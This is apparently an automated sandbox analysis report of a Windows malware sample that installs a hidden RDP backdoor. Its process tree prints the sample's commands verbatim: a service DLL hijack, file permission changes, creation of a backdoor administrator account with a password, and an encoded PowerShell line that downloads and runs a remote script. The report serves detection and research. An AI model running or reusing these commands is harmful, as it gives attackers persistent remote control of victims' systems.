Analysis
-
max time kernel
128s -
max time network
116s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
06-11-2020 11:02
Static task
static1
Behavioral task
behavioral1
Sample
da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe
Resource
win10v20201028
General
-
Target
da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe
-
Size
3.3MB
-
MD5
f2d37d864716da449a7791199ad3eb40
-
SHA1
c04d0b96e4492e1cba6a9604addc1d8f40e98be8
-
SHA256
da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b
-
SHA512
a03ba66cd51e3d9ef9bbbe0f82e704ca1da13aa089dc3e03cc13900ba8f64e432949928de975d4c103ce977707a983ad1a318dc07f1e3a00d4c8daf3c1e69469
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 10 IoCs
Processes:
powershell.exeflow pid process 7 1404 powershell.exe 9 1404 powershell.exe 11 1404 powershell.exe 12 1404 powershell.exe 14 1404 powershell.exe 16 1404 powershell.exe 18 1404 powershell.exe 20 1404 powershell.exe 22 1404 powershell.exe 24 1404 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 2028 icacls.exe 2016 icacls.exe 1016 icacls.exe 1912 takeown.exe 1072 icacls.exe 1716 icacls.exe 1892 icacls.exe 1084 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 1840 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 1612 1612 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 2016 icacls.exe 1016 icacls.exe 1912 takeown.exe 1072 icacls.exe 1716 icacls.exe 1892 icacls.exe 1084 icacls.exe 2028 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Drops file in Windows directory 41 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c54978b0-1422-4127-8451-97773b2270a2 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarC161.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabC2CB.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarC33F.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarC082.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarC31E.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d8d79ce1-0b53-4e5c-9f9d-f23df4099cac powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_12f926ac-4456-4283-b382-5271536248c4 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabC12F.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabC2A9.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarC2CC.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarC2FC.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabC33E.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabC081.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_039a537a-b463-4ed4-bad6-63213505d8c0 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c61c5cb1-2b90-43ce-b81b-dc77e6758b82 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarC130.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabC2FB.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabC160.tmp powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_89300a00-3bce-47fe-a0bd-9d4896e13514 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_666f2396-de9f-4a75-9679-5b587c512ba3 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_602d319b-b9c3-408a-8431-a11cffca64e5 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_834cc426-592e-4edc-b73f-ad71579b3194 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarC2AA.tmp powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WNHZGRD6YP9Y6RTTCZ5D.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_df4f3563-98cc-4715-b6a1-03aa36d924df powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabC31D.tmp powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_aeb1bad8-1493-4e93-849a-27b6abdb2a4f powershell.exe -
Modifies data under HKEY_USERS 60 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\My powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\25\52C64B7E powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f023f46d35b4d601 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 16 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 12 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 14 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exepid process 1840 powershell.exe 1840 powershell.exe 1840 powershell.exe 1840 powershell.exe 1840 powershell.exe 1404 powershell.exe 1404 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 468 1612 1612 1612 1612 -
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
powershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 1840 powershell.exe Token: SeRestorePrivilege 1716 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1516 WMIC.exe Token: SeIncreaseQuotaPrivilege 1516 WMIC.exe Token: SeAuditPrivilege 1516 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1516 WMIC.exe Token: SeIncreaseQuotaPrivilege 1516 WMIC.exe Token: SeAuditPrivilege 1516 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 628 WMIC.exe Token: SeIncreaseQuotaPrivilege 628 WMIC.exe Token: SeAuditPrivilege 628 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 628 WMIC.exe Token: SeIncreaseQuotaPrivilege 628 WMIC.exe Token: SeAuditPrivilege 628 WMIC.exe Token: SeDebugPrivilege 1404 powershell.exe -
Suspicious use of WriteProcessMemory 133 IoCs
Processes:
da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exepowershell.execsc.exenet.execmd.execmd.exenet.exedescription pid process target process PID 2028 wrote to memory of 1840 2028 da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe powershell.exe PID 2028 wrote to memory of 1840 2028 da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe powershell.exe PID 2028 wrote to memory of 1840 2028 da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe powershell.exe PID 2028 wrote to memory of 1840 2028 da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe powershell.exe PID 1840 wrote to memory of 408 1840 powershell.exe csc.exe PID 1840 wrote to memory of 408 1840 powershell.exe csc.exe PID 1840 wrote to memory of 408 1840 powershell.exe csc.exe PID 408 wrote to memory of 576 408 csc.exe cvtres.exe PID 408 wrote to memory of 576 408 csc.exe cvtres.exe PID 408 wrote to memory of 576 408 csc.exe cvtres.exe PID 1840 wrote to memory of 1912 1840 powershell.exe takeown.exe PID 1840 wrote to memory of 1912 1840 powershell.exe takeown.exe PID 1840 wrote to memory of 1912 1840 powershell.exe takeown.exe PID 1840 wrote to memory of 1072 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 1072 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 1072 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 1716 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 1716 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 1716 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 1892 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 1892 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 1892 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 1084 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 1084 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 1084 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 2028 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 2028 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 2028 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 2016 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 2016 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 2016 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 1016 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 1016 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 1016 1840 powershell.exe icacls.exe PID 1840 wrote to memory of 1920 1840 powershell.exe reg.exe PID 1840 wrote to memory of 1920 1840 powershell.exe reg.exe PID 1840 wrote to memory of 1920 1840 powershell.exe reg.exe PID 1840 wrote to memory of 1848 1840 powershell.exe reg.exe PID 1840 wrote to memory of 1848 1840 powershell.exe reg.exe PID 1840 wrote to memory of 1848 1840 powershell.exe reg.exe PID 1840 wrote to memory of 268 1840 powershell.exe reg.exe PID 1840 wrote to memory of 268 1840 powershell.exe reg.exe PID 1840 wrote to memory of 268 1840 powershell.exe reg.exe PID 1840 wrote to memory of 1632 1840 powershell.exe net.exe PID 1840 wrote to memory of 1632 1840 powershell.exe net.exe PID 1840 wrote to memory of 1632 1840 powershell.exe net.exe PID 1632 wrote to memory of 1684 1632 net.exe net1.exe PID 1632 wrote to memory of 1684 1632 net.exe net1.exe PID 1632 wrote to memory of 1684 1632 net.exe net1.exe PID 1840 wrote to memory of 956 1840 powershell.exe cmd.exe PID 1840 wrote to memory of 956 1840 powershell.exe cmd.exe PID 1840 wrote to memory of 956 1840 powershell.exe cmd.exe PID 956 wrote to memory of 916 956 cmd.exe cmd.exe PID 956 wrote to memory of 916 956 cmd.exe cmd.exe PID 956 wrote to memory of 916 956 cmd.exe cmd.exe PID 916 wrote to memory of 920 916 cmd.exe net.exe PID 916 wrote to memory of 920 916 cmd.exe net.exe PID 916 wrote to memory of 920 916 cmd.exe net.exe PID 920 wrote to memory of 1648 920 net.exe net1.exe PID 920 wrote to memory of 1648 920 net.exe net1.exe PID 920 wrote to memory of 1648 920 net.exe net1.exe PID 1840 wrote to memory of 544 1840 powershell.exe cmd.exe PID 1840 wrote to memory of 544 1840 powershell.exe cmd.exe PID 1840 wrote to memory of 544 1840 powershell.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe"C:\Users\Admin\AppData\Local\Temp\da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ntadosty\ntadosty.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3FDE.tmp" "c:\Users\Admin\AppData\Local\Temp\ntadosty\CSC918089AEFB9045FD8E57BB6F6838F66C.TMP"4⤵
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc 8oTGm0XS /add1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc 8oTGm0XS /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 8oTGm0XS /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc 8oTGm0XS1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc 8oTGm0XS2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 8oTGm0XS3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
